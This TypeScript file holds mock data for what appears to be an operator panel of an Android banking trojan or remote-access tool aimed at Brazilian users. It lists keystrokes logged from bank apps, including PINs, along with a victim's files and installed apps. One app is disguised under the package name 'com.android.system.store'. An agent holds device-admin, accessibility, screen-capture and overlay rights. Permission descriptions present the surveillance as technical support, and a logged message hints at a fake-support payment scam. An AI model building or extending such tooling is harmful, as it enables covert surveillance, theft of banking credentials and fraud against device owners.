import type { ControlDevice, DeviceFileItem, DevicePermissionItem, InstalledAppItem, KeyboardEventItem } from "./types";

export const initialControlDevices: ControlDevice[] = [];

export const initialKeyboardLogs: KeyboardEventItem[] = [
  { id: "k1", timestamp: "10:14:22", category: "banco", appName: "Banco Inter", content: "200", type: "value" },
  { id: "k2", timestamp: "10:13:58", category: "whatsapp", appName: "WhatsApp", content: "11999812425", type: "phone" },
  { id: "k3", timestamp: "10:12:10", category: "banco", appName: "Nubank", content: "638421", type: "pin", masked: true },
  { id: "k4", timestamp: "10:11:45", category: "banco", appName: "Itaú", content: "0", type: "input" },
  { id: "k5", timestamp: "10:11:42", category: "banco", appName: "Itaú", content: "2", type: "input" },
  { id: "k6", timestamp: "10:10:05", category: "whatsapp", appName: "WhatsApp", content: "55823635", type: "phone" },
  { id: "k7", timestamp: "10:08:33", category: "banco", appName: "Banco do Brasil", content: "120", type: "value" },
  { id: "k8", timestamp: "10:07:12", category: "banco", appName: "Nubank", content: "420", type: "value" },
  { id: "k9", timestamp: "10:06:50", category: "banco", appName: "Nubank", content: "430", type: "value" },
  { id: "k10", timestamp: "10:05:14", category: "google", appName: "Google Chrome", content: "rastreamento correios sedex", type: "text" },
  { id: "k11", timestamp: "10:04:02", category: "google", appName: "Google Chrome", content: "dview painel admin", type: "text" },
  { id: "k12", timestamp: "10:02:18", category: "whatsapp", appName: "WhatsApp", content: "Confirmado o pagamento do suporte.", type: "text" },
  { id: "k13", timestamp: "09:58:30", category: "banco", appName: "Bradesco", content: "889102", type: "pin", masked: true }
];

export const initialDeviceFiles: DeviceFileItem[] = [
  { id: "f1", name: "Download", path: "/sdcard/Download", isDir: true, modified: "Hoje, 09:30" },
  { id: "f2", name: "DCIM", path: "/sdcard/DCIM", isDir: true, modified: "Ontem, 18:40" },
  { id: "f3", name: "Documents", path: "/sdcard/Documents", isDir: true, modified: "14/09/2026" },
  { id: "f4", name: "WhatsApp", path: "/sdcard/WhatsApp", isDir: true, modified: "Hoje, 10:12" },
  { id: "f5", name: "Pictures", path: "/sdcard/Pictures", isDir: true, modified: "Hoje, 08:15" },
  { id: "f6", name: "relatorio_suporte.pdf", path: "/sdcard/Download/relatorio_suporte.pdf", isDir: false, sizeBytes: 2451000, modified: "Hoje, 09:12", extension: "pdf" },
  { id: "f7", name: "comprovante_pix.png", path: "/sdcard/Download/comprovante_pix.png", isDir: false, sizeBytes: 420500, modified: "Hoje, 10:05", extension: "png" },
  { id: "f8", name: "backup_contatos.vcf", path: "/sdcard/Documents/backup_contatos.vcf", isDir: false, sizeBytes: 128900, modified: "12/09/2026", extension: "vcf" }
];

export const initialInstalledApps: InstalledAppItem[] = [
  {
    id: "a_jadlog",
    name: "Jad Log",
    packageName: "com.android.system.store",
    version: "1.4.8",
    isSystem: false,
    status: "active",
    iconType: "transport",
    iconBg: "#dc2626",
    iconColor: "#ffffff",
    iconLetter: "J",
    sizeMb: 24.2,
    installDate: "17 de set. de 2026",
    permissions: [
      { name: "Câmera", key: "CAMERA", granted: true },
      { name: "Localização", key: "ACCESS_FINE_LOCATION", granted: true },
      { name: "Armazenamento", key: "READ_EXTERNAL_STORAGE", granted: true },
      { name: "Notificações", key: "POST_NOTIFICATIONS", granted: true }
    ]
  },
  {
    id: "a_dview",
    name: "DVIEW Agent",
    packageName: "com.droidview.agent",
    version: "0.1.0",
    isSystem: false,
    status: "active",
    iconType: "system",
    iconBg: "#ff1a2a",
    iconColor: "#ffffff",
    iconLetter: "DV",
    sizeMb: 0.8,
    installDate: "Hoje, 10:00",
    permissions: [
      { name: "Device Admin", key: "DEVICE_ADMIN", granted: true },
      { name: "Acessibilidade", key: "ACCESSIBILITY", granted: true },
      { name: "Transmissão de Tela", key: "MEDIA_PROJECTION", granted: true },
      { name: "Sobreposição", key: "SYSTEM_ALERT_WINDOW", granted: true }
    ]
  },
  {
    id: "a_wpp",
    name: "WhatsApp",
    packageName: "com.whatsapp",
    version: "2.24.16.8",
    isSystem: false,
    status: "active",
    iconType: "chat",
    iconBg: "#25d366",
    iconColor: "#ffffff",
    iconLetter: "WA",
    sizeMb: 88.5,
    installDate: "12 de ago. de 2026",
    permissions: [
      { name: "Contatos", key: "READ_CONTACTS", granted: true },
      { name: "Câmera", key: "CAMERA", granted: true },
      { name: "Microfone", key: "RECORD_AUDIO", granted: true },
      { name: "Armazenamento", key: "READ_EXTERNAL_STORAGE", granted: true }
    ]
  },
  {
    id: "a_nu",
    name: "Nubank",
    packageName: "com.nu.production",
    version: "9.12.3",
    isSystem: false,
    status: "background",
    iconType: "bank",
    iconBg: "#820ad1",
    iconColor: "#ffffff",
    iconLetter: "NU",
    sizeMb: 112.4,
    installDate: "05 de jul. de 2026",
    permissions: [
      { name: "Biometria", key: "USE_BIOMETRIC", granted: true },
      { name: "Câmera", key: "CAMERA", granted: true },
      { name: "Notificações", key: "POST_NOTIFICATIONS", granted: true }
    ]
  },
  {
    id: "a_itau",
    name: "Itaú",
    packageName: "com.itau",
    version: "11.8.0",
    isSystem: false,
    status: "stopped",
    iconType: "bank",
    iconBg: "#ff6200",
    iconColor: "#ffffff",
    iconLetter: "IT",
    sizeMb: 94.0,
    installDate: "15 de jun. de 2026",
    permissions: [
      { name: "Localização", key: "ACCESS_FINE_LOCATION", granted: true },
      { name: "Telefone", key: "READ_PHONE_STATE", granted: true }
    ]
  },
  {
    id: "a_inter",
    name: "Banco Inter",
    packageName: "br.com.intermedium",
    version: "14.2.1",
    isSystem: false,
    status: "background",
    iconType: "bank",
    iconBg: "#ff7a00",
    iconColor: "#ffffff",
    iconLetter: "IN",
    sizeMb: 86.7,
    installDate: "20 de mai. de 2026",
    permissions: [
      { name: "Câmera", key: "CAMERA", granted: true },
      { name: "Biometria", key: "USE_BIOMETRIC", granted: true }
    ]
  },
  {
    id: "a_bb",
    name: "Banco do Brasil",
    packageName: "br.com.bb.android",
    version: "9.34.0",
    isSystem: false,
    status: "stopped",
    iconType: "bank",
    iconBg: "#facc15",
    iconColor: "#002d72",
    iconLetter: "BB",
    sizeMb: 104.2,
    installDate: "10 de jan. de 2026",
    permissions: [{ name: "Biometria", key: "USE_BIOMETRIC", granted: true }]
  },
  {
    id: "a_bradesco",
    name: "Bradesco",
    packageName: "com.bradesco",
    version: "4.22.0",
    isSystem: false,
    status: "stopped",
    iconType: "bank",
    iconBg: "#cc0000",
    iconColor: "#ffffff",
    iconLetter: "B",
    sizeMb: 98.6,
    installDate: "02 de mar. de 2026"
  },
  {
    id: "a_caixa",
    name: "Caixa",
    packageName: "br.gov.caixa.atendimentovirtual",
    version: "3.12.0",
    isSystem: false,
    status: "stopped",
    iconType: "bank",
    iconBg: "#0284c7",
    iconColor: "#ffffff",
    iconLetter: "X",
    sizeMb: 76.5
  },
  {
    id: "a_mercadopago",
    name: "Mercado Pago",
    packageName: "com.mercadopago.wallet",
    version: "2.310.0",
    isSystem: false,
    status: "active",
    iconType: "bank",
    iconBg: "#009ee3",
    iconColor: "#ffffff",
    iconLetter: "MP",
    sizeMb: 82.0
  },
  {
    id: "a_c6",
    name: "C6 Bank",
    packageName: "com.c6bank.app",
    version: "2.48.0",
    isSystem: false,
    status: "stopped",
    iconType: "bank",
    iconBg: "#18181b",
    iconColor: "#ffffff",
    iconLetter: "C6",
    sizeMb: 91.3
  },
  {
    id: "a_chrome",
    name: "Chrome",
    packageName: "com.android.chrome",
    version: "128.0.6613.88",
    isSystem: true,
    status: "active",
    iconType: "browser",
    iconBg: "#4285f4",
    iconColor: "#ffffff",
    iconLetter: "GC",
    sizeMb: 145.0
  },
  {
    id: "a_chatgpt",
    name: "ChatGPT",
    packageName: "com.openai.chatgpt",
    version: "1.2024.185",
    isSystem: false,
    status: "background",
    iconType: "tools",
    iconBg: "#10a37f",
    iconColor: "#ffffff",
    iconLetter: "AI",
    sizeMb: 45.8
  },
  {
    id: "a_instagram",
    name: "Instagram",
    packageName: "com.instagram.android",
    version: "348.0.0.35",
    isSystem: false,
    status: "active",
    iconType: "social",
    iconBg: "#e1306c",
    iconColor: "#ffffff",
    iconLetter: "IG",
    sizeMb: 120.4
  },
  {
    id: "a_tiktok",
    name: "TikTok",
    packageName: "com.zhiliaoapp.musically",
    version: "35.9.3",
    isSystem: false,
    status: "stopped",
    iconType: "social",
    iconBg: "#010101",
    iconColor: "#00f2fe",
    iconLetter: "TT",
    sizeMb: 135.2
  },
  {
    id: "a_youtube",
    name: "YouTube",
    packageName: "com.google.android.youtube",
    version: "19.34.34",
    isSystem: true,
    status: "background",
    iconType: "media",
    iconBg: "#ff0000",
    iconColor: "#ffffff",
    iconLetter: "YT",
    sizeMb: 110.0
  },
  {
    id: "a_ytmusic",
    name: "YouTube Music",
    packageName: "com.google.android.apps.youtube.music",
    version: "7.15.51",
    isSystem: true,
    status: "stopped",
    iconType: "media",
    iconBg: "#cc0000",
    iconColor: "#ffffff",
    iconLetter: "YM",
    sizeMb: 65.0
  },
  {
    id: "a_spotify",
    name: "Spotify",
    packageName: "com.spotify.music",
    version: "8.9.64",
    isSystem: false,
    status: "background",
    iconType: "media",
    iconBg: "#1db954",
    iconColor: "#ffffff",
    iconLetter: "SP",
    sizeMb: 78.4
  },
  {
    id: "a_netflix",
    name: "Netflix",
    packageName: "com.netflix.mediaclient",
    version: "8.125.0",
    isSystem: false,
    status: "stopped",
    iconType: "media",
    iconBg: "#e50914",
    iconColor: "#ffffff",
    iconLetter: "N",
    sizeMb: 62.0
  },
  {
    id: "a_uber",
    name: "Uber",
    packageName: "com.ubercab",
    version: "4.532.10001",
    isSystem: false,
    status: "stopped",
    iconType: "transport",
    iconBg: "#000000",
    iconColor: "#ffffff",
    iconLetter: "UB",
    sizeMb: 85.0
  },
  {
    id: "a_ifood",
    name: "iFood",
    packageName: "br.com.brainweb.ifood",
    version: "9.155.0",
    isSystem: false,
    status: "stopped",
    iconType: "shopping",
    iconBg: "#ea1d2c",
    iconColor: "#ffffff",
    iconLetter: "iF",
    sizeMb: 92.5
  },
  {
    id: "a_shopee",
    name: "Shopee",
    packageName: "com.shopee.br",
    version: "3.30.22",
    isSystem: false,
    status: "stopped",
    iconType: "shopping",
    iconBg: "#ee4d2d",
    iconColor: "#ffffff",
    iconLetter: "SH",
    sizeMb: 96.0
  },
  {
    id: "a_mercadolivre",
    name: "Mercado Livre",
    packageName: "com.mercadolibre",
    version: "10.366.1",
    isSystem: false,
    status: "stopped",
    iconType: "shopping",
    iconBg: "#ffe600",
    iconColor: "#2d3277",
    iconLetter: "ML",
    sizeMb: 108.0
  },
  {
    id: "a_olx",
    name: "OLX",
    packageName: "br.com.olx.olx",
    version: "11.84.0",
    isSystem: false,
    status: "stopped",
    iconType: "shopping",
    iconBg: "#6e0ad6",
    iconColor: "#ffffff",
    iconLetter: "OLX",
    sizeMb: 54.0
  },
  {
    id: "a_airbnb",
    name: "Airbnb",
    packageName: "com.airbnb.android",
    version: "24.12.1",
    isSystem: false,
    status: "stopped",
    iconType: "transport",
    iconBg: "#ff5a5f",
    iconColor: "#ffffff",
    iconLetter: "AB",
    sizeMb: 75.0
  },
  {
    id: "a_gmail",
    name: "Gmail",
    packageName: "com.google.android.gm",
    version: "2024.08.11",
    isSystem: true,
    status: "background",
    iconType: "tools",
    iconBg: "#ea4335",
    iconColor: "#ffffff",
    iconLetter: "M",
    sizeMb: 58.0
  },
  {
    id: "a_maps",
    name: "Maps",
    packageName: "com.google.android.apps.maps",
    version: "11.142.0",
    isSystem: true,
    status: "background",
    iconType: "tools",
    iconBg: "#34a853",
    iconColor: "#ffffff",
    iconLetter: "GM",
    sizeMb: 89.0
  },
  {
    id: "a_drive",
    name: "Drive",
    packageName: "com.google.android.apps.docs",
    version: "2.24.30",
    isSystem: true,
    status: "stopped",
    iconType: "tools",
    iconBg: "#fbbc04",
    iconColor: "#ffffff",
    iconLetter: "DR",
    sizeMb: 67.0
  },
  {
    id: "a_playstore",
    name: "Google Play Store",
    packageName: "com.android.vending",
    version: "42.4.22",
    isSystem: true,
    status: "active",
    iconType: "system",
    iconBg: "#0086f8",
    iconColor: "#ffffff",
    iconLetter: "PS",
    sizeMb: 75.0
  },
  {
    id: "a_settings",
    name: "Configurações",
    packageName: "com.android.settings",
    version: "14",
    isSystem: true,
    status: "background",
    iconType: "system",
    iconBg: "#475569",
    iconColor: "#ffffff",
    iconLetter: "CF",
    sizeMb: 35.0
  },
  {
    id: "a_camera",
    name: "Câmera",
    packageName: "com.sec.android.app.camera",
    version: "14.0",
    isSystem: true,
    status: "stopped",
    iconType: "media",
    iconBg: "#334155",
    iconColor: "#ffffff",
    iconLetter: "CAM",
    sizeMb: 42.0
  },
  {
    id: "a_myfiles",
    name: "Meus Arquivos",
    packageName: "com.sec.android.app.myfiles",
    version: "15.1",
    isSystem: true,
    status: "stopped",
    iconType: "tools",
    iconBg: "#f59e0b",
    iconColor: "#ffffff",
    iconLetter: "ARQ",
    sizeMb: 28.0
  },
  {
    id: "a_samsung_members",
    name: "Samsung Members",
    packageName: "com.samsung.android.voc",
    version: "5.0.01",
    isSystem: true,
    status: "stopped",
    iconType: "system",
    iconBg: "#002c6c",
    iconColor: "#ffffff",
    iconLetter: "SM",
    sizeMb: 44.0
  },
  {
    id: "a_smartswitch",
    name: "Smart Switch",
    packageName: "com.sec.android.easyMover",
    version: "3.7.55",
    isSystem: true,
    status: "stopped",
    iconType: "tools",
    iconBg: "#0072de",
    iconColor: "#ffffff",
    iconLetter: "SS",
    sizeMb: 38.0
  },
  {
    id: "a_cnh",
    name: "CNH do Brasil",
    packageName: "br.gov.serpro.cnhe",
    version: "4.6.1",
    isSystem: false,
    status: "stopped",
    iconType: "tools",
    iconBg: "#15803d",
    iconColor: "#ffffff",
    iconLetter: "CNH",
    sizeMb: 32.0
  },
  {
    id: "a_fgts",
    name: "FGTS",
    packageName: "br.gov.caixa.fgts.trabalhador",
    version: "4.11.2",
    isSystem: false,
    status: "stopped",
    iconType: "tools",
    iconBg: "#0284c7",
    iconColor: "#ffffff",
    iconLetter: "FG",
    sizeMb: 41.0
  },
  {
    id: "a_meuinss",
    name: "Meu INSS",
    packageName: "br.gov.dataprev.meuinss",
    version: "4.14.0",
    isSystem: false,
    status: "stopped",
    iconType: "tools",
    iconBg: "#0369a1",
    iconColor: "#ffffff",
    iconLetter: "INSS",
    sizeMb: 39.0
  },
  {
    id: "a_freefire",
    name: "Free Fire",
    packageName: "com.dts.freefireth",
    version: "1.105.1",
    isSystem: false,
    status: "stopped",
    iconType: "social",
    iconBg: "#f97316",
    iconColor: "#ffffff",
    iconLetter: "FF",
    sizeMb: 520.0
  },
  {
    id: "a_onedrive",
    name: "OneDrive",
    packageName: "com.microsoft.skydrive",
    version: "7.18",
    isSystem: false,
    status: "background",
    iconType: "tools",
    iconBg: "#0078d4",
    iconColor: "#ffffff",
    iconLetter: "OD",
    sizeMb: 68.0
  },
  {
    id: "a_outlook",
    name: "Outlook",
    packageName: "com.microsoft.office.outlook",
    version: "4.2432.1",
    isSystem: false,
    status: "background",
    iconType: "tools",
    iconBg: "#0078d4",
    iconColor: "#ffffff",
    iconLetter: "OL",
    sizeMb: 95.0
  }
];

export const initialPermissions: DevicePermissionItem[] = [
  { id: "p1", title: "Device Admin (Administrador)", permissionKey: "android.app.action.DEVICE_ADMIN_ENABLED", granted: true, critical: true, description: "Permite bloqueio de tela, gestão de políticas de segurança corporativa." },
  { id: "p2", title: "MediaProjection (Transmissão de Tela)", permissionKey: "android.permission.MEDIA_PROJECTION", granted: true, critical: true, description: "Transmite tela ao vivo e captura de visualizações consentidas." },
  { id: "p3", title: "Serviço de Acessibilidade (Auditoria de Eventos)", permissionKey: "android.permission.BIND_ACCESSIBILITY_SERVICE", granted: true, critical: true, description: "Permite registrar eventos de interface e navegação assistida." },
  { id: "p4", title: "Sobrepor a outros aplicativos (Draw Over)", permissionKey: "android.permission.SYSTEM_ALERT_WINDOW", granted: true, critical: false, description: "Exibe indicadores visuais flutuantes de suporte em andamento." },
  { id: "p5", title: "Ouvinte de Notificações", permissionKey: "android.permission.BIND_NOTIFICATION_LISTENER_SERVICE", granted: true, critical: false, description: "Sincroniza notificações recebidas para diagnóstico de chamados." },
  { id: "p6", title: "Acesso a Todos os Arquivos (MANAGE_EXTERNAL_STORAGE)", permissionKey: "android.permission.MANAGE_EXTERNAL_STORAGE", granted: true, critical: false, description: "Navegação na árvore de arquivos para envio de logs e pacotes." }
];
